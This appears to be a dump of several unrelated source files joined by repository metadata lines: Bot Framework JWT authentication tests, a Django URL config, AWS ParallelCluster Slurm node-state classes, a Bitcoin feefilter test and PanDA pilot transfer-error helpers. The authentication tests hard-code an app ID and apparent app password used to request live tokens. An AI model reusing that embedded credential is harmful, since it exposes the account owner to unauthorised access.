str(excinfo.value) @pytest.mark.asyncio async def test_connector_auth_header_and_no_credential_should_not_validate(self): header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token() credentials = SimpleCredentialProvider('', '') with pytest.raises(Exception) as excinfo: await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/') assert 'Unauthorized' in str(excinfo.value) @pytest.mark.asyncio async def test_empty_header_and_no_credential_should_validate(self): header = '' credentials = SimpleCredentialProvider('', '') with pytest.raises(Exception) as excinfo: await JwtTokenValidation.validate_auth_header(header, credentials, '', None) assert 'auth_header' in str(excinfo.value) @pytest.mark.asyncio async def test_emulator_msa_header_correct_app_id_and_service_url_should_validate(self): header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token() credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '') result = await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/') assert result @pytest.mark.asyncio async def test_emulator_msa_header_and_no_credential_should_not_validate(self): header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token() credentials = SimpleCredentialProvider('00000000-0000-0000-0000-000000000000', '') with pytest.raises(Exception) as excinfo: await JwtTokenValidation.validate_auth_header(header, credentials, '', None) assert 'Unauthorized' in excinfo @pytest.mark.asyncio # Tests with a valid Token and service url; and ensures that Service url is added to Trusted service url list. async def test_channel_msa_header_Valid_service_url_should_be_trusted(self): activity = Activity(service_url = 'https://smba.trafficmanager.net/amer-client-ss.msg/') header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token() credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '') await JwtTokenValidation.authenticate_request(activity, header, credentials) assert MicrosoftAppCredentials.is_trusted_service('https://smba.trafficmanager.net/amer-client-ss.msg/') @pytest.mark.asyncio async def test_channel_msa_header_from_user_specified_tenant(self): activity = Activity(service_url = 'https://smba.trafficmanager.net/amer-client-ss.msg/') header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F', 'microsoft.com').get_access_token(True) credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '') claims = await JwtTokenValidation.authenticate_request(activity, header, credentials) assert claims.get_claim_value("tid") == '72f988bf-86f1-41af-91ab-2d7cd011db47' @pytest.mark.asyncio # Tests with a valid Token and invalid service url; and ensures that Service url is NOT added to Trusted service url list. async def test_channel_msa_header_invalid_service_url_should_not_be_trusted(self): activity = Activity(service_url = 'https://webchat.botframework.com/') header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token() credentials = SimpleCredentialProvider('7f74513e-6f96-4dbc-be9d-9a81fea22b88', '') with pytest.raises(Exception) as excinfo: await JwtTokenValidation.authenticate_request(activity, header, credentials) assert 'Unauthorized' in str(excinfo.value) assert not MicrosoftAppCredentials.is_trusted_service('https://webchat.botframework.com/') @pytest.mark.asyncio # Tests with no authentication header and makes sure the service URL is not added to the trusted list. async def test_channel_authentication_disabled_should_be_anonymous(self): activity = Activity(service_url = 'https://webchat.botframework.com/') header = '' credentials = SimpleCredentialProvider('', '') claimsPrincipal = await JwtTokenValidation.authenticate_request(activity, header, credentials) assert claimsPrincipal == None @pytest.mark.asyncio # Tests with no authentication header and makes sure the service URL is not added to the trusted list. async def test_channel_authentication_disabled_service_url_should_not_be_trusted(self): activity = Activity(service_url = 'https://webchat.botframework.com/') header = '' credentials = SimpleCredentialProvider('', '') await JwtTokenValidation.authenticate_request(activity, header, credentials) assert not MicrosoftAppCredentials.is_trusted_service('https://webchat.botframework.com/')
58.675214
158
0.75295
4c056a7c6bfe871f925cd90d9aab06e383ec131b
339
py
Python
superadmin/urls.py
nkmrohit/python
bd644d51909cda548684b5da98eab998564f3568
[ "Apache-2.0" ]
null
null
null
superadmin/urls.py
nkmrohit/python
bd644d51909cda548684b5da98eab998564f3568
[ "Apache-2.0" ]
null
null
null
superadmin/urls.py
nkmrohit/python
bd644d51909cda548684b5da98eab998564f3568
[ "Apache-2.0" ]
null
null
null
from django.contrib import admin from django.conf.urls import include, url from django.urls import path from django.conf import settings from django.conf.urls.static import static import authUser.views urlpatterns = [ url('auth/', include('adminauth.urls')), ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
21.1875
65
0.769912
8ff42132c461b74eb57d15e0f6df1f38c7d55644
20,290
py
Python
src/slurm_plugin/slurm_resources.py
lukeseawalker/cfncluster-node
0c7619a6440a5848a1d0bb3ff88c33b197055a48
[ "Apache-2.0" ]
33
2018-11-14T14:54:47.000Z
2022-03-22T23:47:51.000Z
src/slurm_plugin/slurm_resources.py
gmarciani/aws-parallelcluster-node
ab77de979f429676ef228a49fecd3cf28a6eec4c
[ "Apache-2.0" ]
180
2019-02-21T09:33:10.000Z
2022-03-31T08:01:28.000Z
src/slurm_plugin/slurm_resources.py
gmarciani/aws-parallelcluster-node
ab77de979f429676ef228a49fecd3cf28a6eec4c
[ "Apache-2.0" ]
35
2019-02-06T13:36:18.000Z
2022-03-01T12:54:05.000Z
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance # with the License. A copy of the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and # limitations under the License. import logging import re from abc import ABCMeta, abstractmethod from enum import Enum from common.utils import time_is_up logger = logging.getLogger(__name__) # Possible ec2 health status: 'ok'|'impaired'|'insufficient-data'|'not-applicable'|'initializing' EC2_HEALTH_STATUS_UNHEALTHY_STATES = {"impaired"} # Possible instance states: 'pending'|'running'|'shutting-down'|'terminated'|'stopping'|'stopped' EC2_INSTANCE_HEALTHY_STATES = {"pending", "running"} EC2_INSTANCE_STOP_STATES = {"stopping", "stopped"} EC2_INSTANCE_ALIVE_STATES = EC2_INSTANCE_HEALTHY_STATES | EC2_INSTANCE_STOP_STATES EC2_SCHEDULED_EVENT_CODES = [ "instance-reboot", "system-reboot", "system-maintenance", "instance-retirement", "instance-stop", ] CONFIG_FILE_DIR = "/etc/parallelcluster/slurm_plugin" class EC2Instance: def __init__(self, id, private_ip, hostname, launch_time): """Initialize slurm node with attributes.""" self.id = id self.private_ip = private_ip self.hostname = hostname self.launch_time = launch_time self.slurm_node = None def __eq__(self, other): """Compare 2 SlurmNode objects.""" if isinstance(other, EC2Instance): return self.__dict__ == other.__dict__ return False def __repr__(self): attrs = ", ".join(["{key}={value}".format(key=key, value=repr(value)) for key, value in self.__dict__.items()]) return "{class_name}({attrs})".format(class_name=self.__class__.__name__, attrs=attrs) def __str__(self): return f"{self.id}" def __hash__(self): return hash(self.id) class PartitionStatus(Enum): UP = "UP" DOWN = "DOWN" INACTIVE = "INACTIVE" DRAIN = "DRAIN" def __str__(self): return str(self.value) class SlurmPartition: def __init__(self, name, nodenames, state): """Initialize slurm partition with attributes.""" self.name = name self.nodenames = nodenames self.state = state self.slurm_nodes = [] def is_inactive(self): return self.state == "INACTIVE" def has_running_job(self): return any(node.is_running_job() for node in self.slurm_nodes) def get_online_node_by_type(self, terminate_drain_nodes, terminate_down_nodes): online_compute_resources = set() if not self.state == "INACTIVE": for node in self.slurm_nodes: if ( node.is_healthy(terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=False) and node.is_online() ): logger.debug("Currently online node: %s, node state: %s", node.name, node.state_string) online_compute_resources.add(node.get_compute_resource_name()) return online_compute_resources def __eq__(self, other): """Compare 2 SlurmPartition objects.""" if isinstance(other, SlurmPartition): return self.__dict__ == other.__dict__ return False class SlurmNode(metaclass=ABCMeta): SLURM_SCONTROL_BUSY_STATES = {"MIXED", "ALLOCATED", "COMPLETING"} SLURM_SCONTROL_IDLE_STATE = "IDLE" SLURM_SCONTROL_DOWN_STATE = "DOWN" SLURM_SCONTROL_DRAIN_STATE = "DRAIN" SLURM_SCONTROL_POWERING_DOWN_STATES = {"POWERING_DOWN", "POWER_DOWN"} SLURM_SCONTROL_POWER_STATE = {"IDLE", "CLOUD", "POWERED_DOWN"} SLURM_SCONTROL_POWER_UP_STATE = "POWERING_UP" SLURM_SCONTROL_ONLINE_STATES = {"IDLE+CLOUD", "MIXED+CLOUD", "ALLOCATED+CLOUD", "COMPLETING+CLOUD"} SLURM_SCONTROL_POWER_WITH_JOB_STATE = {"MIXED", "CLOUD", "POWERED_DOWN"} SLURM_SCONTROL_RESUME_FAILED_STATE = {"DOWN", "CLOUD", "POWERED_DOWN", "NOT_RESPONDING"} def __init__(self, name, nodeaddr, nodehostname, state, partitions=None, instance=None): """Initialize slurm node with attributes.""" self.name = name self.nodeaddr = nodeaddr self.nodehostname = nodehostname self.state_string = state self.states = set(state.split("+")) self.partitions = partitions.strip().split(",") if partitions else None self.instance = instance self.is_static_nodes_in_replacement = False self._is_being_replaced = False self._is_replacement_timeout = False self.is_failing_health_check = False def is_nodeaddr_set(self): """Check if nodeaddr(private ip) for the node is set.""" return self.nodeaddr != self.name def has_job(self): """Check if slurm node is in a working state.""" return any(working_state in self.states for working_state in self.SLURM_SCONTROL_BUSY_STATES) def _is_drain(self): """Check if slurm node is in any drain(draining, drained) states.""" return self.SLURM_SCONTROL_DRAIN_STATE in self.states def is_drained(self): """ Check if slurm node is in drained state. drained(sinfo) is equivalent to IDLE+DRAIN(scontrol) or DOWN+DRAIN(scontrol) """ return self._is_drain() and (self.SLURM_SCONTROL_IDLE_STATE in self.states or self.is_down()) def is_powering_down(self): """Check if slurm node is in powering down state.""" return any( powering_down_state in self.states for powering_down_state in self.SLURM_SCONTROL_POWERING_DOWN_STATES ) def is_power(self): """Check if slurm node is in power state.""" return self.SLURM_SCONTROL_POWER_STATE == self.states def is_down(self): """Check if slurm node is in a down state.""" return self.SLURM_SCONTROL_DOWN_STATE in self.states and not self.is_powering_down() def is_up(self): """Check if slurm node is in a healthy state.""" return not self._is_drain() and not self.is_down() and not self.is_powering_down() def is_powering_up(self): """Check if slurm node is in powering up state.""" return self.SLURM_SCONTROL_POWER_UP_STATE in self.states def is_online(self): """Check if slurm node is online with backing instance.""" return self.state_string in self.SLURM_SCONTROL_ONLINE_STATES def is_configuring_job(self): """Check if slurm node is configuring with job and haven't begun to run a job.""" return self.is_powering_up() and self.has_job() def is_power_with_job(self): """Dynamic nodes allocated a job but power up process has not started yet.""" return self.states == self.SLURM_SCONTROL_POWER_WITH_JOB_STATE def is_running_job(self): """Check if slurm node is running a job but not in configuring job state.""" return not self.is_powering_up() and self.has_job() and not self.is_power_with_job() def is_resume_failed(self): """Check if node resume timeout expires.""" return self.states == self.SLURM_SCONTROL_RESUME_FAILED_STATE def is_poweing_up_idle(self): """Check if node is in IDLE# state.""" return self.SLURM_SCONTROL_IDLE_STATE in self.states and self.is_powering_up() @abstractmethod def is_state_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True): """Check if a slurm node's scheduler state is considered healthy.""" pass @abstractmethod def is_bootstrap_failure(self): """ Check if a slurm node has boostrap failure. Here's the cases of bootstrap error we are checking: Bootstrap error that causes instance to self terminate. Bootstrap error that prevents instance from joining cluster but does not cause self termination. """ pass @abstractmethod def is_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True): """Check if a slurm node is considered healthy.""" pass @abstractmethod def is_powering_down_with_nodeaddr(self): """Check if a slurm node is a powering down node with instance backing.""" pass def is_backing_instance_valid(self, log_warn_if_unhealthy=True): """Check if a slurm node's addr is set, it points to a valid instance in EC2.""" if self.is_nodeaddr_set(): if not self.instance: if log_warn_if_unhealthy: logger.warning( "Node state check: no corresponding instance in EC2 for node %s, node state: %s", self, self.state_string, ) return False return True @abstractmethod def needs_reset_when_inactive(self): """Check if the node need to be reset if node is inactive.""" pass def get_compute_resource_name(self): """Get instance name of given node.""" _, _, compute_resource_name = parse_nodename(self.name) return compute_resource_name def __eq__(self, other): """Compare 2 SlurmNode objects.""" if isinstance(other, SlurmNode): return self.__dict__ == other.__dict__ return False def __repr__(self): attrs = ", ".join(["{key}={value}".format(key=key, value=repr(value)) for key, value in self.__dict__.items()]) return "{class_name}({attrs})".format(class_name=self.__class__.__name__, attrs=attrs) def __str__(self): return f"{self.name}({self.nodeaddr})" def __hash__(self): return hash(self.name) class StaticNode(SlurmNode): def __init__(self, name, nodeaddr, nodehostname, state, partitions=None, instance=None): """Initialize slurm node with attributes.""" super().__init__(name, nodeaddr, nodehostname, state, partitions, instance) def is_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True): """Check if a slurm node is considered healthy.""" return ( self._is_static_node_configuration_valid(log_warn_if_unhealthy=log_warn_if_unhealthy) and self.is_backing_instance_valid(log_warn_if_unhealthy=log_warn_if_unhealthy) and self.is_state_healthy( terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=log_warn_if_unhealthy ) ) def is_state_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True): """Check if a slurm node's scheduler state is considered healthy.""" # Check to see if node is in DRAINED, ignoring any node currently being replaced if self.is_drained() and terminate_drain_nodes: if self._is_being_replaced: logger.debug( "Node state check: node %s in DRAINED but is currently being replaced, ignoring, node state: %s", self, self.state_string, ) return True else: if log_warn_if_unhealthy: logger.warning("Node state check: node %s in DRAINED, node state: %s", self, self.state_string) return False # Check to see if node is in DOWN, ignoring any node currently being replaced elif self.is_down() and terminate_down_nodes: if self._is_being_replaced: logger.debug( "Node state check: node %s in DOWN but is currently being replaced, ignoring. Node state: ", self, self.state_string, ) return True else: if log_warn_if_unhealthy: logger.warning("Node state check: node %s in DOWN, node state: %s", self, self.state_string) return False return True def _is_static_node_configuration_valid(self, log_warn_if_unhealthy=True): """Check if static node is configured with a private IP.""" if not self.is_nodeaddr_set(): if log_warn_if_unhealthy: logger.warning( "Node state check: static node without nodeaddr set, node %s, node state %s:", self, self.state_string, ) return False return True def is_bootstrap_failure(self): """Check if a slurm node has boostrap failure.""" if self.is_static_nodes_in_replacement and not self.is_backing_instance_valid(log_warn_if_unhealthy=False): # Node is currently in replacement and no backing instance logger.warning( "Node bootstrap error: Node %s is currently in replacement and no backing instance, node state %s:", self, self.state_string, ) return True # Replacement timeout expires for node in replacement elif self._is_replacement_timeout: logger.warning( "Node bootstrap error: Replacement timeout expires for node %s in replacement, node state %s:", self, self.state_string, ) return True elif self.is_failing_health_check and self.is_static_nodes_in_replacement: logger.warning( "Node bootstrap error: Node %s failed during bootstrap when performing health check, node state %s:", self, self.state_string, ) return True return False def is_powering_down_with_nodeaddr(self): """Check if a slurm node is a powering down node with instance backing. Static node will not powering down.""" return False def needs_reset_when_inactive(self): """Check if the node need to be reset if node is inactive.""" return self.is_nodeaddr_set() class DynamicNode(SlurmNode): def __init__(self, name, nodeaddr, nodehostname, state, partitions=None, instance=None): """Initialize slurm node with attributes.""" super().__init__(name, nodeaddr, nodehostname, state, partitions, instance) def is_state_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True): """Check if a slurm node's scheduler state is considered healthy.""" # Check to see if node is in DRAINED, ignoring any node currently being replaced if self.is_drained() and terminate_drain_nodes: if log_warn_if_unhealthy: logger.warning("Node state check: node %s in DRAINED, node state: %s", self, self.state_string) return False # Check to see if node is in DOWN, ignoring any node currently being replaced elif self.is_down() and terminate_down_nodes: if not self.is_nodeaddr_set(): # Silently handle failed to launch dynamic node to clean up normal logging logger.debug("Node state check: node %s in DOWN, node state: %s", self, self.state_string) else: if log_warn_if_unhealthy: logger.warning("Node state check: node %s in DOWN, node state: %s", self, self.state_string) return False return True def is_healthy(self, terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=True): """Check if a slurm node is considered healthy.""" return self.is_backing_instance_valid(log_warn_if_unhealthy=log_warn_if_unhealthy) and self.is_state_healthy( terminate_drain_nodes, terminate_down_nodes, log_warn_if_unhealthy=log_warn_if_unhealthy ) def is_bootstrap_failure(self): """Check if a slurm node has boostrap failure.""" # no backing instance + [working state]# in node state if (self.is_configuring_job() or self.is_poweing_up_idle()) and not self.is_backing_instance_valid( log_warn_if_unhealthy=False ): logger.warning( "Node bootstrap error: Node %s is in power up state without valid backing instance, node state: %s", self, self.state_string, ) return True # Dynamic node in DOWN+CLOUD+POWERED_DOWN+NOT_RESPONDING state elif self.is_resume_failed() and self.is_nodeaddr_set(): # We need to check if nodeaddr is set to avoid counting powering up nodes as bootstrap failure nodes during # cluster start/stop. logger.warning( "Node bootstrap error: Resume timeout expires for node %s, node state: %s", self, self.state_string ) return True elif self.is_failing_health_check and self.is_powering_up(): logger.warning( "Node bootstrap error: Node %s failed during bootstrap when performing health check, node state: %s", self, self.state_string, ) return True return False def is_powering_down_with_nodeaddr(self): """Check if a slurm node is a powering down node with instance backing.""" return self.is_nodeaddr_set() and (self.is_power() or self.is_powering_down()) def needs_reset_when_inactive(self): """Check if the node need to be reset if node is inactive.""" return self.is_nodeaddr_set() or (not (self.is_power() or self.is_powering_down() or self.is_down())) class EC2InstanceHealthState: def __init__(self, id, state, instance_status, system_status, scheduled_events): """Initialize slurm node with attributes.""" self.id = id self.state = state self.instance_status = instance_status self.system_status = system_status self.scheduled_events = scheduled_events def fail_ec2_health_check(self, current_time, health_check_timeout): """Check if instance is failing any EC2 health check for more than health_check_timeout.""" try: if ( # Check instance status self.instance_status.get("Status") in EC2_HEALTH_STATUS_UNHEALTHY_STATES and time_is_up( self.instance_status.get("Details")[0].get("ImpairedSince"), current_time, health_check_timeout, ) ) or ( # Check system status self.system_status.get("Status") in EC2_HEALTH_STATUS_UNHEALTHY_STATES and time_is_up( self.system_status.get("Details")[0].get("ImpairedSince"), current_time, health_check_timeout, ) ): return True except Exception as e: logger.warning("Error when parsing instance health status %s, with exception: %s", self, e) return False return False def fail_scheduled_events_check(self): """Check if instance has EC2 scheduled maintenance event.""" if self.scheduled_events: return True return False class InvalidNodenameError(ValueError): r""" Exception raised when encountering a NodeName that is invalid/incorrectly formatted. Valid NodeName format: {queue-name}-{st/dy}-{compute-resource}-{number} And match: ^([a-z0-9\-]+)-(st|dy)-([a-z0-9\-]+)-\d+$ Sample NodeName: queue-1-st-computeresource-2 """ pass def parse_nodename(nodename): """Parse queue_name, node_type (st vs dy) and instance_type from nodename.""" nodename_capture = re.match(r"^([a-z0-9\-]+)-(st|dy)-([a-z0-9\-]+)-\d+$", nodename) if not nodename_capture: raise InvalidNodenameError queue_name, node_type, compute_resource_name = nodename_capture.groups() return queue_name, node_type, compute_resource_name
41.492843
119
0.648448
8a2c43a2ce7edc4425faae33fb8cc260020487d6
3,942
py
Python
test/functional/p2p_feefilter.py
patrickdugan/BlockPo-to-Tradelayer
ba1ebf3c329751d414302577a09481ba28db1815
[ "MIT" ]
null
null
null
test/functional/p2p_feefilter.py
patrickdugan/BlockPo-to-Tradelayer
ba1ebf3c329751d414302577a09481ba28db1815
[ "MIT" ]
5
2021-06-21T21:21:53.000Z
2021-06-22T20:10:16.000Z
test/functional/p2p_feefilter.py
patrickdugan/BlockPo-to-Tradelayer
ba1ebf3c329751d414302577a09481ba28db1815
[ "MIT" ]
1
2021-06-21T21:14:45.000Z
2021-06-21T21:14:45.000Z
#!/usr/bin/env python3 # Copyright (c) 2016-2017 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test processing of feefilter messages.""" from test_framework.mininode import * from test_framework.test_framework import BitcoinTestFramework from test_framework.util import * import time def hashToHex(hash): return format(hash, '064x') # Wait up to 60 secs to see if the testnode has received all the expected invs def allInvsMatch(invsExpected, testnode): for x in range(60): with mininode_lock: if (sorted(invsExpected) == sorted(testnode.txinvs)): return True time.sleep(1) return False class TestNode(P2PInterface): def __init__(self): super().__init__() self.txinvs = [] def on_inv(self, message): for i in message.inv: if (i.type == 1): self.txinvs.append(hashToHex(i.hash)) def clear_invs(self): with mininode_lock: self.txinvs = [] class FeeFilterTest(BitcoinTestFramework): def set_test_params(self): self.num_nodes = 2 # We lower the various required feerates for this test # to catch a corner-case where feefilter used to slightly undercut # mempool and wallet feerate calculation based on GetFee # rounding down 3 places, leading to stranded transactions. # See issue #16499 self.extra_args = [["-minrelaytxfee=0.00000100", "-mintxfee=0.00000100"]]*self.num_nodes def run_test(self): node1 = self.nodes[1] node0 = self.nodes[0] # Get out of IBD node1.generate(1) sync_blocks(self.nodes) # Setup the p2p connections and start up the network thread. self.nodes[0].add_p2p_connection(TestNode()) network_thread_start() self.nodes[0].p2p.wait_for_verack() # Test that invs are received for all txs at feerate of 20 sat/byte node1.settxfee(Decimal("0.00020000")) txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)] assert(allInvsMatch(txids, self.nodes[0].p2p)) self.nodes[0].p2p.clear_invs() # Set a filter of 15 sat/byte self.nodes[0].p2p.send_and_ping(msg_feefilter(15000)) # Test that txs are still being received (paying 20 sat/byte) txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)] assert(allInvsMatch(txids, self.nodes[0].p2p)) self.nodes[0].p2p.clear_invs() # Change tx fee rate to 10 sat/byte and test they are no longer received node1.settxfee(Decimal("0.00010000")) [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)] sync_mempools(self.nodes) # must be sure node 0 has received all txs # Send one transaction from node0 that should be received, so that we # we can sync the test on receipt (if node1's txs were relayed, they'd # be received by the time this node0 tx is received). This is # unfortunately reliant on the current relay behavior where we batch up # to 35 entries in an inv, which means that when this next transaction # is eligible for relay, the prior transactions from node1 are eligible # as well. node0.settxfee(Decimal("0.00020000")) txids = [node0.sendtoaddress(node0.getnewaddress(), 1)] assert(allInvsMatch(txids, self.nodes[0].p2p)) self.nodes[0].p2p.clear_invs() # Remove fee filter and check that txs are received again self.nodes[0].p2p.send_and_ping(msg_feefilter(0)) txids = [node1.sendtoaddress(node1.getnewaddress(), 1) for x in range(3)] assert(allInvsMatch(txids, self.nodes[0].p2p)) self.nodes[0].p2p.clear_invs() if __name__ == '__main__': FeeFilterTest().main()
39.029703
96
0.662608
81f6e2ac54f1810cfd522811e9935cacd8b8c39b
8,184
py
Python
pilot/copytool/common.py
ptrlv/pilot2
c5a83e0eccf7de7bee81705064508198cf09cb49
[ "Apache-2.0" ]
null
null
null
pilot/copytool/common.py
ptrlv/pilot2
c5a83e0eccf7de7bee81705064508198cf09cb49
[ "Apache-2.0" ]
null
null
null
pilot/copytool/common.py
ptrlv/pilot2
c5a83e0eccf7de7bee81705064508198cf09cb49
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Authors: # - Tobias Wegner, tobias.wegner@cern.ch, 2017 # - Paul Nilsson, paul.nilsson@cern.ch, 2017 import logging import os import re from pilot.common.errorcodes import ErrorCodes from pilot.util.filehandling import calculate_checksum, get_checksum_type, get_checksum_value logger = logging.getLogger(__name__) def get_timeout(filesize): """ Get a proper time-out limit based on the file size. :param filesize: file size (int). :return: """ timeout_max = 3 * 3600 # 3 hours timeout_min = 300 # self.timeout timeout = timeout_min + int(filesize / 0.5e6) # approx < 0.5 Mb/sec return min(timeout, timeout_max) def verify_catalog_checksum(fspec, path): """ Verify that the local and remote (fspec) checksum values are the same. The function will update the fspec object. :param fspec: FileSpec object for a given file. :param path: path to local file (string). :return: state (string), diagnostics (string). """ diagnostics = "" state = "" checksum_type = get_checksum_type(fspec.checksum) checksum_catalog = get_checksum_value(fspec.checksum) if checksum_type == 'unknown': diagnostics = 'unknown checksum type for checksum(catalog): %s' % fspec.checksum logger.warning(diagnostics) fspec.status_code = ErrorCodes.UNKNOWNCHECKSUMTYPE fspec.status = 'failed' state = 'UNKNOWN_CHECKSUM_TYPE' else: checksum_local = calculate_checksum(path, algorithm=checksum_type) logger.info('checksum (catalog): %s (type: %s)' % (checksum_catalog, checksum_type)) logger.info('checksum (local): %s' % checksum_local) if checksum_local and checksum_local != '' and checksum_local != checksum_catalog: diagnostics = 'checksum verification failed: checksum (catalog)=%s != checksum (local)=%s' % \ (checksum_catalog, checksum_local) logger.warning(diagnostics) fspec.status_code = ErrorCodes.GETADMISMATCH if checksum_type == 'ad32' else ErrorCodes.GETMD5MISMATCH fspec.status = 'failed' state = 'AD_MISMATCH' if checksum_type == 'ad32' else 'MD_MISMATCH' else: logger.info('catalog and local checksum values are the same') return state, diagnostics def merge_destinations(files): """ Converts the file-with-destination dict to a destination-with-files dict :param files Files to merge :returns destination-with-files dictionary """ destinations = {} # ensure type(files) == list for f in files: # ensure destination in f if not os.path.exists(f['destination']): f['status'] = 'failed' f['errmsg'] = 'Destination directory does not exist: %s' % f['destination'] f['errno'] = 1 else: # ensure scope, name in f f['status'] = 'running' f['errmsg'] = 'File not yet successfully downloaded.' f['errno'] = 2 lfn = '%s:%s' % (f['scope'], f['name']) dst = destinations.setdefault(f['destination'], {'lfns': set(), 'files': list()}) dst['lfns'].add(lfn) dst['files'].append(f) return destinations def get_copysetup(copytools, copytool_name): """ Return the copysetup for the given copytool. :param copytools: copytools list from infosys. :param copytool name: name of copytool (string). :return: copysetup (string). """ copysetup = "" for ct in copytools.keys(): if copytool_name == ct: copysetup = copytools[ct].get('setup') break return copysetup def get_error_info(rcode, state, error_msg): """ Return an error info dictionary specific to transfer errors. Helper function to resolve_common_transfer_errors(). :param rcode: return code (int). :param state: state string used in Rucio traces. :param error_msg: transfer command stdout (string). :return: dictionary with format {'rcode': rcode, 'state': state, 'error': error_msg}. """ return {'rcode': rcode, 'state': state, 'error': error_msg} def output_line_scan(ret, output): """ Do some reg exp on the transfer command output to search for special errors. Helper function to resolve_common_transfer_errors(). :param ret: pre-filled error info dictionary with format {'rcode': rcode, 'state': state, 'error': error_msg} :param output: transfer command stdout (string). :return: updated error info dictionary. """ for line in output.split('\n'): m = re.search("Details\s*:\s*(?P<error>.*)", line) if m: ret['error'] = m.group('error') elif 'service_unavailable' in line: ret['error'] = 'service_unavailable' ret['rcode'] = ErrorCodes.RUCIOSERVICEUNAVAILABLE return ret def resolve_common_transfer_errors(output, is_stagein=True): """ Resolve any common transfer related errors. :param output: stdout from transfer command (string). :param is_stagein: optional (boolean). :return: dict {'rcode': rcode, 'state': state, 'error': error_msg}. """ # default to make sure dictionary exists and all fields are populated (some of which might be overwritten below) ret = get_error_info(ErrorCodes.STAGEINFAILED if is_stagein else ErrorCodes.STAGEOUTFAILED, 'COPY_ERROR', 'Copy operation failed [is_stagein=%s]: %s' % (is_stagein, output)) if "timeout" in output: ret = get_error_info(ErrorCodes.STAGEINTIMEOUT if is_stagein else ErrorCodes.STAGEOUTTIMEOUT, 'CP_TIMEOUT', 'copy command timed out: %s' % output) elif "does not match the checksum" in output and 'adler32' in output: ret = get_error_info(ErrorCodes.GETADMISMATCH if is_stagein else ErrorCodes.PUTADMISMATCH, 'AD_MISMATCH', output) elif "does not match the checksum" in output and 'adler32' not in output: ret = get_error_info(ErrorCodes.GETMD5MISMATCH if is_stagein else ErrorCodes.PUTMD5MISMATCH, 'MD5_MISMATCH', output) elif "globus_xio:" in output: ret = get_error_info(ErrorCodes.GETGLOBUSSYSERR if is_stagein else ErrorCodes.PUTGLOBUSSYSERR, 'GLOBUS_FAIL', "Globus system error: %s" % output) elif "File exists" in output or 'SRM_FILE_BUSY' in output or 'file already exists' in output: ret = get_error_info(ErrorCodes.FILEEXISTS, 'FILE_EXISTS', "File already exists in the destination: %s" % output) elif "No such file or directory" in output and is_stagein: ret = get_error_info(ErrorCodes.MISSINGINPUTFILE, 'MISSING_INPUT', output) elif "query chksum is not supported" in output or "Unable to checksum" in output: ret = get_error_info(ErrorCodes.CHKSUMNOTSUP, 'CHKSUM_NOTSUP', output) elif "Could not establish context" in output: error_msg = "Could not establish context: Proxy / VO extension of proxy has probably expired: %s" % output ret = get_error_info(ErrorCodes.NOPROXY, 'CONTEXT_FAIL', error_msg) elif "No space left on device" in output: ret = get_error_info(ErrorCodes.NOLOCALSPACE if is_stagein else ErrorCodes.NOREMOTESPACE, 'NO_SPACE', "No available space left on disk: %s" % output) elif "No such file or directory" in output: ret = get_error_info(ErrorCodes.NOSUCHFILE, 'NO_FILE', output) elif "service is not available at the moment" in output: ret = get_error_info(ErrorCodes.SERVICENOTAVAILABLE, 'SERVICE_ERROR', output) elif "Network is unreachable" in output: ret = get_error_info(ErrorCodes.UNREACHABLENETWORK, 'NETWORK_UNREACHABLE', output) else: # reg exp the output ret = output_line_scan(ret, output) return ret
39.921951
116
0.659213
d3cc0245efb050062a005341fc62d2b5dedd9e9a
1,425
py
Python
qucumber/__init__.py
silky/QuCumber
f0dd8725b8dd3a0c94f10f1a3b88a769c63a567f
[ "ECL-2.0", "Apache-2.0" ]
1
2019-06-27T11:26:29.000Z
2019-06-27T11:26:29.000Z
qucumber/__init__.py
silky/QuCumber
f0dd8725b8dd3a0c94f10f1a3b88a769c63a567f
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
qucumber/__init__.py
silky/QuCumber
f0dd8725b8dd3a0c94f10f1a3b88a769c63a567f
[ "ECL-2.0", "Apache-2.0" ]
null
